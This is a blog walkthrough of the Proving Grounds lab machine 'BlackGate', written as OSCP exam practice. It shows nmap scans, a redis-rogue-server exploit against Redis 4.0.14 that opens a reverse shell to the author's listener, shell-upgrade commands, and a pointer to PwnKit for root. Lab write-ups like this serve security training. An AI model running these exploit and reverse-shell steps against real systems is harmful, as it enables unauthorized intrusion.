Proving grounds:BlackGate

Al1z4deh:~# echo "Welcome"
2 min readOct 16, 2022

--

Today we will take a look at Proving grounds: BlackGate. My purpose in sharing this post is to prepare for oscp exam. It is also to show you the way if you are in trouble. Please try to understand each step and take notes.

  • Network scan
└─# nmap -Pn -p- — min-rate 10000 192.168.100.176 
Starting Nmap 7.92 ( https://nmap.org ) at 2022-10-16 13:03 EDT
Warning: 192.168.100.176 giving up on port because retransmission cap hit (10).
Nmap scan report for 192.168.100.176
Host is up (0.099s latency).
Not shown: 55372 closed tcp ports (reset), 10161 filtered tcp ports (no-response)
PORT STATE SERVICE
22/tcp open ssh
6379/tcp open redis└─# nmap -sCV -p6379 192.168.100.176 
Starting Nmap 7.92 ( https://nmap.org ) at 2022–10–16 13:04 EDT
Nmap scan report for 192.168.100.176
Host is up (0.24s latency).PORT STATE SERVICE VERSION
6379/tcp open redis Redis key-value store 4.0.14
  • redis (6379)

6379 - Pentesting Redis

By default Redis can be accessed without credentials. However, it can be configured to support only password, or…

book.hacktricks.xyz

GitHub - n0b0dyCN/redis-rogue-server: Redis(<=5.0.5) RCE

Redis(<=5.0.5) RCE. Contribute to n0b0dyCN/redis-rogue-server development by creating an account on GitHub.

github.com

┌──(root㉿kali)-[~/ctf/redis-rogue-server]
└─# ./redis-rogue-server.py — rhost 192.168.100.176 — lhost 192.168.49.100
______ _ _ ______ _____ 
| ___ \ | (_) | ___ \ / ___| 
| |_/ /___ __| |_ ___ | |_/ /___ __ _ _ _ ___ \ ` — . ___ _ ____ _____ _ __ 
| // _ \/ _` | / __| | // _ \ / _` | | | |/ _ \ ` — . \/ _ \ ‘__\ \ / / _ \ ‘__|
| |\ \ __/ (_| | \__ \ | |\ \ (_) | (_| | |_| | __/ /\__/ / __/ | \ V / __/ | 
\_| \_\___|\__,_|_|___/ \_| \_\___/ \__, |\__,_|\___| \____/ \___|_| \_/ \___|_| 
 __/ | 
 |___/ 
@copyright n0b0dy @ r3kapig[info] TARGET 192.168.100.176:6379
[info] SERVER 192.168.49.100:21000
[info] Setting master…
[info] Setting dbfilename…
[info] Loading module…
[info] Temerory cleaning up…
What do u want, [i]nteractive shell or [r]everse shell: r
[info] Open reverse shell…
Reverse server address: 192.168.49.100
Reverse server port: 6379
[info] Reverse shell payload sent.
[info] Check at 192.168.49.100:6379
[info] Unload module…

Listen

nc -nvlp 6379python3 -c 'import pty;pty.spawn("/bin/bash");'export TERM=xterm
Ctrl + z
stty raw -echo ; fg
resetprudence@blackgate:/home/prudence$ whoami
prudence
prudence@blackgate:/home/prudence$ pwd
/home/prudence
prudence@blackgate:/home/prudence$

The privesc of this machine is reverse engineering. That’s why I couldn’t solve it. But to root you can use pwnkit

PwnKit: Local Privilege Escalation Vulnerability Discovered in polkit's pkexec (CVE-2021-4034) |…

The Qualys Research Team has discovered a memory corruption vulnerability in polkit's pkexec, a SUID-root program that…

blog.qualys.com

“If you have any questions or comments, please do not hesitate to write. Have a good days”

https://www.linkedin.com/in/elman-al1z4deh/

Provinggrounds
Redis
Oscp

--

--

Al1z4deh:~# echo "Welcome"

Written by Al1z4deh:~# echo "Welcome"

373 Followers

Al1z4deh:~# echo "eJPT, CEH, OSCP"

More from Al1z4deh:~# echo "Welcome"

See all from Al1z4deh:~# echo "Welcome"

Recommended from Medium

Lists

A search field with results below. In the background are book covers.

Now in AI: Handpicked by Better Programming

266 stories153 saves
See more recommendations

Help

Status

Writers

Blog

Careers

Privacy

Terms

About

Text to speech

Teams